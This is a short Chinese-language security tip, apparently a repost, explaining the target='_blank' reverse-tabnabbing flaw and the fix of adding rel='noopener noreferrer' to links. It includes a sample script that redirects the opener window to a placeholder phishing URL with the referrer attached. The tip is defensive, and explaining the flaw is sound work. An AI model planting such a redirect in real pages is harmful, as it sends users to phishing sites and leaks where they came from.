target="_blank" 安全漏洞 要增加 rel="nofollow me noopener noreferrer" 来堵住钓鱼安全漏洞

(target="_blank"安全漏洞极为普遍)解决方法:
在超链接上增加 rel="nofollow me noopener noreferrer"

target="_blank" 如果未加上rel="noopener"属性, 就会让用户暴露在一个简单的钓鱼攻击之下，可以使用以下脚本来

    if (window.opener) {
        window.opener.location = "https://phishing.link?referrer=" + document.referrer;
    }

window.opener API会给新页面对原有窗口的访问入口,并授予一些权限。这其中的一些权限被跨域限制拦截了，但是window.location是漏网之鱼。

参考 ：https://my.oschina.net/jsan/blog/741317
转载原文： https://www.zcfy.cc/article/the-target-blank-vulnerability-by-example-1178.html